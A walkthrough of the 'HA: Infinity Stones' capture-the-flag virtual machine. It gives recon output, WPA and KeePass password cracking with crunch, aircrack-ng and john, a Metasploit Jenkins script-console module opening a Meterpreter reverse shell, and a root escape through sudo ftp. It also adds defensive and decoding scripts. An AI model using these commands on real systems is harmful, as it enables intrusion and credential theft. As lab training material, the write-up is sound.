HA: Infinity Stones-Write-up



  • The theme is the Avengers again; this time it is the Infinity Stones.

Information Gathering

  • The virtual machine's IP is 192.168.116.137:
➜  ~ nmap -sn 192.168.116.1/24      
Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-23 19:53 CST
Nmap scan report for 192.168.116.1
Host is up (0.0019s latency).
Nmap scan report for 192.168.116.137
Host is up (0.00076s latency).
Nmap done: 256 IP addresses (2 hosts up) scanned in 2.55 seconds
➜  ~ nmap -A -T4 192.168.116.137 -p-
Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-23 20:09 CST
Nmap scan report for 192.168.116.137
Host is up (0.0091s latency).
Not shown: 65531 closed ports
PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 84:d2:2e:c4:f7:21:12:54:05:ac:82:c4:05:f2:32:29 (RSA)
|   256 f7:9d:0f:23:ec:d6:de:ed:2b:b2:11:bf:ea:68:3d:b9 (ECDSA)
|_  256 78:ef:fc:36:47:e6:f3:8d:03:3a:39:69:60:4f:2a:71 (ED25519)
80/tcp   open  http     Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: HA:Infinity Stones
443/tcp  open  ssl/http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: HA:Infinity Stones
| ssl-cert: Subject: commonName=ignite/organizationName=MINDSTONE:{4542E4C233F26B4FAF6B5F3FED24280C}/stateOrProvinceName=UP/countryName=IN
| Not valid before: 2019-09-15T17:18:57
|_Not valid after:  2020-09-14T17:18:57
|_ssl-date: TLS randomness does not represent time
| tls-alpn: 
|_  http/1.1
8080/tcp open  http     Jetty 9.4.z-SNAPSHOT
| http-robots.txt: 1 disallowed entry 
|_/
|_http-server-header: Jetty(9.4.z-SNAPSHOT)
|_http-title: Site doesn't have a title (text/html;charset=utf-8).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.67 seconds
➜  ~
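  • SSH and three web services:
  • Port 80: the home page shows pictures of the six stones, and there is also a quiz page.
  • Port 443: the certificate in the Nmap output is clearly abnormal; it is far too long.
  • First stone in hand: MINDSTONE:{4542E4C233F26B4FAF6B5F3FED24280C}
  • Port 8080: redirects to the Jenkins login page.
  • Start by scanning the directories on port 80: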
➜  ~ dirb http://192.168.116.137   
-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Mon Sep 23 20:32:09 2019
URL_BASE: http://192.168.116.137/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.116.137/ ----
==> DIRECTORY: http://192.168.116.137/images/                                                                                                                                                                                                 
==> DIRECTORY: http://192.168.116.137/img/                                                                                                                                                                                                    
+ http://192.168.116.137/index.html (CODE:200|SIZE:3261)                                                                                                                                                                                      
+ http://192.168.116.137/server-status (CODE:403|SIZE:280)                                                                                                                                                                                    
==> DIRECTORY: http://192.168.116.137/wifi/                                                                                                                                                                                                   
                                                                                                                                                                                                                                              
---- Entering directory: http://192.168.116.137/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                                                                                              
---- Entering directory: http://192.168.116.137/img/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                                                                                              
---- Entering directory: http://192.168.116.137/wifi/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
-----------------
END_TIME: Mon Sep 23 20:32:12 2019
DOWNLOADED: 4612 - FOUND: 2
➜  ~
  • Three directories were found:
http://192.168.116.137/wifi/
http://192.168.116.137/img/
http://192.168.116.137/images/

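Cracking the WiFi Password

  • The wifi directory contains a pwd.txt, which appears to describe the password rules, and a packet capture; the password is presumably what decrypts that capture.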
➜  ~ curl "http://192.168.116.137/wifi/pwd.txt"    
Your Password is thanos daughter name   "gam" (note it's all lower case) plus the following
I enforced new password requirement on you ... 12 characters

One uppercase charracter
Two Numbers
Two Lowercase
The Year of first avengers came out in threatre
➜  ~
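  • The hint says the password starts with gam, all lower case, followed by one uppercase letter, two digits, two lowercase letters, and the year the first Avengers film was released. For example: gamA12bc2012, a 12-character password in total.
  • Over to crunch:
%      stands for a digit
^      stands for a special symbol
@      stands for a lowercase letter
,      stands for an uppercase letter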
---
➜  VulnHub crunch 12 12 -t gam,%%@@2012 -o dict.txt
Crunch will now generate the following amount of data: 22848800 bytes
21 MB
0 GB
0 TB
0 PB
Crunch will now generate the following number of lines: 1757600 

crunch: 100% completed generating output
➜  VulnHub
  • Cracking the WiFi password, a basic Kali exercise.
➜  VulnHub aircrack-ng reality.cap -w dict.txt 
Opening reality.capease wait...
Read 4848 packets.

   #  BSSID              ESSID                     Encryption

   1  38:D5:47:42:EE:A0  Kavish_2.4Ghz             WPA (1 handshake)

Choosing first network as target.

Opening reality.capease wait...
Read 4848 packets.

1 potential targets
Aircrack-ng 1.5.2 

      [00:00:56] 128345/1757592 keys tested (2277.47 k/s) 

      Time left: 11 minutes, 55 seconds                          7.30%

                         KEY FOUND! [ gamA00fe2012 ]


      Master Key     : 90 EC 8F B0 CC E3 C5 0E EE AC AD 05 0B A9 08 47 
                       FD 4D 3E 55 60 7D B3 B0 92 21 FB 06 BA 96 53 90 

      Transient Key  : 66 85 68 5E A3 0C BD 5E 6E 3D ED 66 DC 07 76 9F 
                       08 5B CD E3 58 56 D6 AB 18 5C CC 75 7C 1D A3 E7 
                       87 BE 75 0F 24 EA 12 AC C5 EE 56 34 4C B5 3A 40 
                       73 77 F2 F3 D0 C7 DC E5 ED 5A A0 83 87 37 94 31 

      EAPOL HMAC     : AB 9A 17 CA 09 25 69 2B 71 06 76 EA F8 FE 23 67 
➜  VulnHub
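  • The password is gamA00fe2012, and the contents of the capture can then be inspected with WireShark. At first I assumed the flag was in the capture, because I have run into that before. Since we are here anyway, here is how to decrypt an encrypted WiFi pcap, which is also why you should not connect to unfamiliar WiFi hotspots.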
➜  VulnHub airdecap-ng -e Kavish_2.4Ghz -p gamA00fe2012 reality.cap 
Total number of stations seen            5
Total number of packets read          4848
Total number of WEP data packets         0
Total number of WPA data packets       245
Number of plaintext data packets         0
Number of decrypted WEP  packets         0
Number of corrupted WEP  packets         0
Number of decrypted WPA  packets       136
Number of bad TKIP (WPA) packets         0
Number of bad CCMP (WPA) packets         0
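  • When it finishes, a reality-dec.cap file is created in the current directory by default; open it directly in WireShark to see the data inside. Happy? Surprised? I don't tell this to just anyone.
  • Alternatively, add the WiFi password in WireShark under Preferences, Protocols, IEEE 802.11.
  • After all that effort, the flag turned out not to be in the capture at all, damn it. The password is actually used as a URL path, and a file under it holds the flag.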
➜  VulnHub curl "http://192.168.116.137/gamA00fe2012/realitystone.txt"
REALITYSTONE:{4542E4C233F26B4FAF6B5F3FED24280C}
➜  VulnHub
  • Second stone in hand: REALITYSTONE:{4542E4C233F26B4FAF6B5F3FED24280C}
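
Why the 12-character rule in pwd.txt offered so little protection, as an added example (not part of the original write-up): it sizes the keyspace of the crunch mask used above and compares it with a random password of the same length. The mask and the keys-per-second rate come from the output on this page; the 33-symbol size for `^` and the 62-character comparison alphabet are assumptions.

```python
import math

# Sizes of crunch's default character classes. The 33-symbol count for "^"
# is an assumption about the default charset; adjust it to your build.
CLASS_SIZES = {"@": 26, ",": 26, "%": 10, "^": 33}


def mask_keyspace(mask):
    """Candidates generated by a crunch -t mask; literal characters count once."""
    total = 1
    for ch in mask:
        total *= CLASS_SIZES.get(ch, 1)
    return total


def wordlist_bytes(mask):
    """Size of the generated wordlist: one line per candidate plus a newline."""
    return mask_keyspace(mask) * (len(mask) + 1)


def entropy_bits(keyspace):
    """Bits of uncertainty left to whoever knows the composition rule."""
    return math.log2(keyspace)


def minutes_to_exhaust(keyspace, keys_per_second):
    """Worst-case time to try every candidate at the given rate."""
    return keyspace / keys_per_second / 60


def policy_report(mask, keys_per_second, alphabet=62):
    """Compare the mask-constrained password with a random one of equal length.

    alphabet=62 (a-z, A-Z, 0-9) is an assumption made for the comparison.
    """
    constrained = mask_keyspace(mask)
    uniform = alphabet ** len(mask)
    return {
        "candidates": constrained,
        "wordlist_bytes": wordlist_bytes(mask),
        "constrained_bits": round(entropy_bits(constrained), 1),
        "random_bits": round(entropy_bits(uniform), 1),
        "minutes_to_exhaust": round(
            minutes_to_exhaust(constrained, keys_per_second), 1
        ),
    }


if __name__ == "__main__":
    # Mask and rate taken from the crunch and aircrack-ng output on this page.
    for key, value in policy_report("gam,%%@@2012", 2277.47).items():
        print(f"{key}: {value}")
```

The candidate and byte counts match what crunch reported, which confirms that only five of the twelve characters were ever unknown.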

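Quiz

  • The second clue is the hint on the quiz page: Computers tells us Binary is the path to Reality. It is a small quiz: 1 for true, 0 for false, eight questions in total, and the eight digits form a URL path. I just brute-forced it here, since I can't read English anyway.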
➜  VulnHub dirb http://192.168.116.137 01.txt 

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Tue Sep 24 00:16:29 2019
URL_BASE: http://192.168.116.137/
WORDLIST_FILES: 01.txt

-----------------

GENERATED WORDS: 256                                                           

---- Scanning URL: http://192.168.116.137/ ----
==> DIRECTORY: http://192.168.116.137/01101001/                                                                                                                                                                                               
                                                                                                                                                                                                                                              
---- Entering directory: http://192.168.116.137/01101001/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
-----------------
END_TIME: Tue Sep 24 00:16:29 2019
DOWNLOADED: 256 - FOUND: 0
➜  VulnHub 
➜  VulnHub curl "http://192.168.116.137/01101001/hints.txt"           
+++++ ++++[ ->+++ +++++ +<]>+ +++++ +++++ +++++ .+++. +++++ ++++. ----.
+++++ .<+++ ++++[ ->--- ----< ]>--- .<+++ +++[- >++++ ++<]> +++.< ++++[
->+++ +<]>+ ++++. <++++ [->-- --<]> -.+++ +++++ +.--- ----. --.<+ ++[->
+++<] >++++ .+.<
➜  VulnHub
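  • The strange characters above are BF for short; the full name is not fit to write on a blog. Decoding it online gives admin:avengers, which looks like a username and password for basic authentication; set it aside for now.

Exif Information

  • The img directory found earlier contains just one image; reading its Exif information with exiftool reveals a flag.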
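
The hint can also be decoded locally instead of pasting it into an online service. The interpreter below is an added example, not part of the original write-up; the tape size, 8-bit wrapping cells and step limit are assumptions, and the program text is the hints.txt content shown above.

```python
# hints.txt exactly as returned by the curl request above.
HINTS = """
+++++ ++++[ ->+++ +++++ +<]>+ +++++ +++++ +++++ .+++. +++++ ++++. ----.
+++++ .<+++ ++++[ ->--- ----< ]>--- .<+++ +++[- >++++ ++<]> +++.< ++++[
->+++ +<]>+ ++++. <++++ [->-- --<]> -.+++ +++++ +.--- ----. --.<+ ++[->
+++<] >++++ .+.<
"""


def run_bf(program, stdin=b"", tape_size=30000, max_steps=1_000_000):
    """Run a BF program and return its output as text.

    Characters outside the eight commands are ignored. max_steps bounds
    execution so an untrusted program cannot loop forever.
    """
    code = [c for c in program if c in "+-<>[].,"]

    # Pre-compute matching bracket positions and reject unbalanced input.
    jumps, stack = {}, []
    for pos, cmd in enumerate(code):
        if cmd == "[":
            stack.append(pos)
        elif cmd == "]":
            if not stack:
                raise ValueError("unmatched ']' at command %d" % pos)
            start = stack.pop()
            jumps[start], jumps[pos] = pos, start
    if stack:
        raise ValueError("unmatched '[' at command %d" % stack[-1])

    tape = [0] * tape_size
    ptr = pc = steps = 0
    out = bytearray()
    data = iter(stdin)
    while pc < len(code):
        steps += 1
        if steps > max_steps:
            raise RuntimeError("step limit exceeded")
        cmd = code[pc]
        if cmd == "+":
            tape[ptr] = (tape[ptr] + 1) % 256
        elif cmd == "-":
            tape[ptr] = (tape[ptr] - 1) % 256
        elif cmd == ">":
            ptr += 1
        elif cmd == "<":
            ptr -= 1
        elif cmd == ".":
            out.append(tape[ptr])
        elif cmd == ",":
            tape[ptr] = next(data, 0)  # end of input reads as 0
        elif cmd == "[" and tape[ptr] == 0:
            pc = jumps[pc]
        elif cmd == "]" and tape[ptr] != 0:
            pc = jumps[pc]
        if not 0 <= ptr < tape_size:
            raise IndexError("data pointer left the tape")
        pc += 1
    return out.decode("latin-1")


if __name__ == "__main__":
    print(run_bf(HINTS))
```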
➜  VulnHub wget http://192.168.116.137/img/space.jpg                                       
--2019-09-24 00:22:01--  http://192.168.116.137/img/space.jpg
正在連接 192.168.116.137:80... 已連接。
已發出 HTTP 請求,正在等待回應... 200 OK
長度:17002 (17K) [image/jpeg]
正在保存至: “space.jpg”

space.jpg                                                   100%[==========================================================================================================================================>]  16.60K  --.-KB/s  用時 0s      

2019-09-24 00:22:01 (98.5 MB/s) - 已保存 “space.jpg” [17002/17002])

➜  VulnHub exiftool space.jpg 
ExifTool Version Number         : 11.50
File Name                       : space.jpg
Directory                       : .
File Size                       : 17 kB
File Modification Date/Time     : 2019:09:13 13:35:30+08:00
File Access Date/Time           : 2019:09:24 00:22:01+08:00
File Inode Change Date/Time     : 2019:09:24 00:22:01+08:00
File Permissions                : rw-r--r--
File Type                       : JPEG
File Type Extension             : jpg
MIME Type                       : image/jpeg
JFIF Version                    : 1.01
Resolution Unit                 : None
X Resolution                    : 1
Y Resolution                    : 1
Comment                         : SPACESTONE:{74E57403424607145B9B77809DEB49D0}
Image Width                     : 768
Image Height                    : 432
Encoding Process                : Baseline DCT, Huffman coding
Bits Per Sample                 : 8
Color Components                : 3
Y Cb Cr Sub Sampling            : YCbCr4:2:0 (2 2)
Image Size                      : 768x432
Megapixels                      : 0.332
➜  VulnHub
  • Third stone in hand: SPACESTONE:{74E57403424607145B9B77809DEB49D0}

Jenkins

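  • The credentials found above, admin:avengers, were tried at http://192.168.116.137:8080/login?from=%2F, a Jenkins admin console, and the password is correct. First, a link: https://github.com/gquere/pwn_jenkins. A git client RCE happened to come out 8 days ago and I wanted to try it; plugin management shows the version is 2.8.6, and the vulnerable git plugin versions are those <3.12.0, but the installed version is 3.12.1. MSF has an exploit module, sweet.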
msf5 exploit(multi/http/jenkins_script_console) > show options 

Module options (exploit/multi/http/jenkins_script_console):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   API_TOKEN                   no        The API token for the specified username
   PASSWORD   avengers         no        The password for the specified username
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     192.168.116.137  yes       The target address range or CIDR identifier
   RPORT      8080             yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT    8080             yes       The local port to listen on.
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       The path to the Jenkins-CI application
   URIPATH                     no        The URI to use for this exploit (default is random)
   USERNAME   admin            no        The username to authenticate as
   VHOST                       no        HTTP server virtual host


Exploit target:

   Id  Name
   --  ----
   1   Linux


msf5 exploit(multi/http/jenkins_script_console) > run 

[*] Started reverse TCP handler on 192.168.116.1:4444 
[*] Checking access to the script console
[*] Logging in...
[*] Using CSRF token: '8c428c023cf3d9b8ad5a0b5ec036aff8' (Jenkins-Crumb style)
[*] 192.168.116.137:8080 - Sending Linux stager...
[*] Sending stage (985320 bytes) to 192.168.116.137
[*] Meterpreter session 1 opened (192.168.116.1:4444 -> 192.168.116.137:36498) at 2019-09-24 15:30:27 +0800

meterpreter >
  • Switch to an interactive terminal: python3 -c 'import pty;pty.spawn("/bin/bash")'. There is no python in the PATH, but python3 is there.
python3 -c 'import pty;pty.spawn("/bin/bash")'
jenkins@ubuntu:/home/morag$ find / -perm -u=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
/bin/umount
/bin/su
/bin/mount
/bin/fusermount
/bin/ping
/bin/ntfs-3g
/opt/script
/usr/bin/chfn
/usr/bin/pkexec
/usr/bin/gpasswd
/usr/bin/arping
/usr/bin/chsh
/usr/bin/newgrp
/usr/bin/sudo
/usr/bin/vmware-user-suid-wrapper
/usr/bin/traceroute6.iputils
/usr/bin/passwd
/usr/sbin/pppd
/usr/lib/eject/dmcrypt-get-device
/usr/lib/xorg/Xorg.wrap
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/snapd/snap-confine
/usr/lib/openssh/ssh-keysign
/snap/core18/1144/bin/mount
/snap/core18/1144/bin/ping
/snap/core18/1144/bin/su
/snap/core18/1144/bin/umount
/snap/core18/1144/usr/bin/chfn
/snap/core18/1144/usr/bin/chsh
/snap/core18/1144/usr/bin/gpasswd
/snap/core18/1144/usr/bin/newgrp
/snap/core18/1144/usr/bin/passwd
/snap/core18/1144/usr/bin/sudo
/snap/core18/1144/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core18/1144/usr/lib/openssh/ssh-keysign
/snap/core/7713/bin/mount
/snap/core/7713/bin/ping
/snap/core/7713/bin/ping6
/snap/core/7713/bin/su
/snap/core/7713/bin/umount
/snap/core/7713/usr/bin/chfn
/snap/core/7713/usr/bin/chsh
/snap/core/7713/usr/bin/gpasswd
/snap/core/7713/usr/bin/newgrp
/snap/core/7713/usr/bin/passwd
/snap/core/7713/usr/bin/sudo
/snap/core/7713/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core/7713/usr/lib/openssh/ssh-keysign
/snap/core/7713/usr/lib/snapd/snap-confine
/snap/core/7713/usr/sbin/pppd
/snap/core/6350/bin/mount
/snap/core/6350/bin/ping
/snap/core/6350/bin/ping6
/snap/core/6350/bin/su
/snap/core/6350/bin/umount
/snap/core/6350/usr/bin/chfn
/snap/core/6350/usr/bin/chsh
/snap/core/6350/usr/bin/gpasswd
/snap/core/6350/usr/bin/newgrp
/snap/core/6350/usr/bin/passwd
/snap/core/6350/usr/bin/sudo
/snap/core/6350/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core/6350/usr/lib/openssh/ssh-keysign
/snap/core/6350/usr/lib/snapd/snap-confine
/snap/core/6350/usr/sbin/pppd
jenkins@ubuntu:/home/morag$
  • Found /opt/script; run it:
jenkins@ubuntu:/home/morag$ cd /opt
cd /opt
jenkins@ubuntu:/opt$ ls
ls
morag.kdbx  script
jenkins@ubuntu:/opt$ ./script
./script
TIMESTONE:{141BC86DFD5C40E3CC37219C18D471CA}jenkins@ubuntu:/opt$
  • Fourth stone: TIMESTONE:{141BC86DFD5C40E3CC37219C18D471CA}

Cracking KeePass

  • There is also a file with a kdbx extension; morag is a username.
TIMESTONE:{141BC86DFD5C40E3CC37219C18D471CA}jenkins@ubuntu:/opt$ file morag.kdbx
file morag.kdbx
morag.kdbx: Keepass password database 2.x KDBX
jenkins@ubuntu:/opt$
  • Keepass password database 2.x KDBX: download it, convert it to a hash with keepass2john, then crack it with John.
➜  VulnHub keepass2john morag.kdbx 
morag:$keepass$*2*60000*0*ad52c2bc4d6e8f1aad80c53c3aa8c89cd010a2b06be6e9fc18339fc03f62b025*955d58975ce2542fbcc0e7d8b0a70df4eeadb12f02ca2be7b3c0c2dfe08766d9*ee9d589925b32d8a502d92252079ebef*6bdf7df906c8e9e51d24e9249c7a5356face1d19cc475bdd3024802e1134c32a*4112e70f66d462b734768ade8950f0157b8eb3748c571be886f891f9c906b1b0
➜  VulnHub keepass2john morag.kdbx >keepass.hash
➜  VulnHub john keepass.hash 
Warning: detected hash type "KeePass", but the string is also recognized as "KeePass-opencl"
Use the "--format=KeePass-opencl" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (KeePass [SHA256 AES 32/64])
Cost 1 (iteration count) is 60000 for all loaded hashes
Cost 2 (version) is 2 for all loaded hashes
Cost 3 (algorithm [0=AES, 1=TwoFish, 2=ChaCha]) is 0 for all loaded hashes
Will run 4 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Warning: Only 2 candidates buffered for the current salt, minimum 8 needed for performance.
Warning: Only 4 candidates buffered for the current salt, minimum 8 needed for performance.
Warning: Only 5 candidates buffered for the current salt, minimum 8 needed for performance.
Warning: Only 4 candidates buffered for the current salt, minimum 8 needed for performance.
Warning: Only 5 candidates buffered for the current salt, minimum 8 needed for performance.
Warning: Only 3 candidates buffered for the current salt, minimum 8 needed for performance.
Warning: Only 5 candidates buffered for the current salt, minimum 8 needed for performance.
Warning: Only 7 candidates buffered for the current salt, minimum 8 needed for performance.
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst, rules:Wordlist
princesa         (morag)
1g 0:00:00:13 DONE 2/3 (2019-09-24 16:03) 0.07283g/s 209.9p/s 209.9c/s 209.9C/s pretty..fuckyou1
Use the "--show" option to display all of the cracked passwords reliably
Session completed
➜  VulnHub john keepass.hash --show
morag:princesa

1 password hash cracked, 0 left
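  • The credentials are morag:princesa. Since a morag user was seen under /home, they should come in handy. First open morag.kdbx in KeePass and enter the password; the stored password can be copied to the clipboard: An98XArsp1Ncj0hAZLda. That password turned out to be wrong, but the notes contain another piece of text; a blind guess of base64 decodes it to morag:yondu, so the password is yondu. Switching user from the jenkins shell succeeds, and the SSH service can be logged into as well.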
jenkins@ubuntu:/opt$ su morag
su morag
Password: yondu

morag@ubuntu:/opt$ ls
morag@ubuntu:~$ sudo -l
sudo -l
Matching Defaults entries for morag on ubuntu:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User morag may run the following commands on ubuntu:
    (root) NOPASSWD: /usr/bin/ftp
morag@ubuntu:~$ 
ftp> help
help
Commands may be abbreviated.  Commands are:

!		dir		mdelete		qc		site
$		disconnect	mdir		sendport	size
account		exit		mget		put		status
append		form		mkdir		pwd		struct
ascii		get		mls		quit		system
bell		glob		mode		quote		sunique
binary		hash		modtime		recv		tenex
bye		help		mput		reget		tick
case		idle		newer		rstatus		trace
cd		image		nmap		rhelp		type
cdup		ipany		nlist		rename		user
chmod		ipv4		ntrans		reset		umask
close		ipv6		open		restart		verbose
cr		lcd		prompt		rmdir		?
delete		ls		passive		runique
debug		macdef		proxy		send
ftp> !/bin/bash
!/bin/bash
root@ubuntu:~# id
id
uid=0(root) gid=0(root) groups=0(root)
root@ubuntu:~# 
root@ubuntu:/root# ls
ls
final.txt
root@ubuntu:/root# cat final.txt
cat final.txt
┬┬╔═╗┌─┐┌┐┌┌─┐┬─┐┌─┐┌┬┐┬ ┬┬  ┌─┐┌┬┐┬┌─┐┌┐┌┌─┐  ┬ ┬┌─┐┬ ┬  ┌─┐┌─┐┬ ┬┌┐┌┌┬┐  ┌┬┐┬ ┬┌─┐  ┌─┐┬┌┐┌┌─┐┬    ┌─┐┬  ┌─┐┌─┐  ┬┬
││║  │ │││││ ┬├┬┘├─┤ │ │ ││  ├─┤ │ ││ ││││└─┐  └┬┘│ ││ │  ├┤ │ ││ ││││ ││   │ ├─┤├┤   ├┤ ││││├─┤│    ├┤ │  ├─┤│ ┬  ││
oo╚═╝└─┘┘└┘└─┘┴└─┴ ┴ ┴ └─┘┴─┘┴ ┴ ┴ ┴└─┘┘└┘└─┘   ┴ └─┘└─┘  └  └─┘└─┘┘└┘─┴┘   ┴ ┴ ┴└─┘  └  ┴┘└┘┴ ┴┴─┘  └  ┴─┘┴ ┴└─┘  oo

                            ,g@@@@@@g,
                           @@@@NMMN@@@g,gggpg,
                          ]@@@`    "@@@@@@@@@@@@  ,,,,
                          ]@@@      $@@@"   "%@@@@@@@@@@g
                          ]@@@      $@@@     ]@@@@M*"*%@@@g@@@@@@g
                          ]@@@      $@@@     ]@@@L     ]@@@@@NN@@@@g
                          ]@@@      $@@@     ]@@@`     ]@@@'    ]@@@L
                          ]@@@ggg   $@@@     ]@@@`     ]@@@      $@@P
                          ]@@@@@@L  $@@@@@@  ]@@@L     ]@@@      $@@P
                          ]@@@@@  1 "%@@@@F  '%@@@@@W  $@@@,,,   $@@P
                          ]@@@@@,    $@@@L  2  ]@@@M   '%@@@@@  ]@@@@,
                      ,,,,]@@@@@@@g@@@@@@@,   ,@@@@  3  $@@@'   '%@@@
                  ,g@@@@@@@@@@"%%N@@NM*%@@@@@@@@@@@@,,,,@@@@L 4  ]@@@F
                 g@@@M*"""%@@@          '"MMMMM'"%@@@@@@@@@@@@g,,g@@@M
                j@@@F     ]@@@                     "****' "%@@@@@@@@P
                ]@@@L     ]@@@              ,ggggg,          ''"}$@@P
                ]@@@L  g@@@@@@            g@@@@@@@@@g      j@@@  $@@P
                ]@@@L  %NN@@@@           $@@@C   ]@@@@     ]@@@L $@@P
                ]@@@L     '%M"          j@@@F  6  ]@@@     ]@@@L $@@P
                ]@@@L                   '@@@@     $@@@     ]@@@L $@@P
                ]@@@gg@@@@w              ]@@@@ggg@@@@L     ]@@@L]@@@L
                 %@@@@@@NM"               '%@@@@@@@M`     ;@@@M j@@@L
                 ]@@@@     ,@@g               ''`        #@@@M )@@@M
                 ]@@@L  5  $@@@                          `**`,@@@@F
                  ]@@@Wggg@@@@F                           ,g@@@@@`
                   "%@@@@@@@@@@@@@@@g                  ,@@@@@@@@@
                       '""*%N@@@@@@@M                   *MF" '$@@@
                            @@@@                          gg, j@@@,
                           $@@@`                         j@@@L %@@@
                          .@@@@                           %@@@ ]@@@



			SOULSTONE:{56F06B4DAC14CE346998483989ABFF16}    


-----------Contact Undersigned to share your feedback with HACKING ARTICLES Teams-------------

AArti Singh: https://www.linkedin.com/in/aarti-singh-353698114/

Kavish Tyagi: Tyagi_kavish_ Twitter
  • Fifth stone in hand: SOULSTONE:{56F06B4DAC14CE346998483989ABFF16}
  • One more is under the Flag label in KeePass: POWERSTONE:{EDDF140F156862C9B494C0B767DCD412}
  • All six are collected, so snap your fingers.
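
The root shell above came from a single sudoers rule, so a host audit can look for that pattern in `sudo -l` output. The checker below is an added example, not part of the original write-up; the SHELL_CAPABLE set is a starting assumption to extend from local policy, and the systemctl rule in the sample is constructed for contrast.

```python
import os
import re

# Programs that can start a shell from their own prompt. "ftp" is the case
# shown on this page ("!" at the ftp> prompt); the shells are self-evident.
# Illustrative starting set (assumption), to be extended from local policy.
SHELL_CAPABLE = {"ftp", "sh", "bash"}

# Matches rule lines such as "    (root) NOPASSWD: /usr/bin/ftp".
RULE = re.compile(
    r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmds>\S.*)$"
)

# sudo -l output from this page, plus one constructed harmless rule.
SUDO_L_OUTPUT = """\
Matching Defaults entries for morag on ubuntu:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin

User morag may run the following commands on ubuntu:
    (root) NOPASSWD: /usr/bin/ftp
    (root) /usr/bin/systemctl status nginx
"""


def audit_sudo_l(output, shell_capable=SHELL_CAPABLE):
    """Return the sudo rules that hand the caller a privileged shell."""
    findings = []
    for line in output.splitlines():
        match = RULE.match(line)
        if not match:
            continue  # Defaults lines, headers and blank lines
        runas = match.group("runas").split(":")[0].strip()
        tags = {t.strip() for t in match.group("tags").split(":") if t.strip()}
        for cmd in (c.strip() for c in match.group("cmds").split(",")):
            if not cmd:
                continue
            binary = cmd.split()[0]
            reasons = []
            if binary == "ALL":
                reasons.append("unrestricted command set")
            elif os.path.basename(binary) in shell_capable:
                reasons.append("binary can spawn a shell as the run-as user")
            if not reasons or runas not in ("root", "ALL"):
                continue
            if "NOPASSWD" in tags:
                reasons.append("no password required")
            findings.append({"runas": runas, "command": cmd, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in audit_sudo_l(SUDO_L_OUTPUT):
        print(finding["command"], "->", "; ".join(finding["reasons"]))
```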

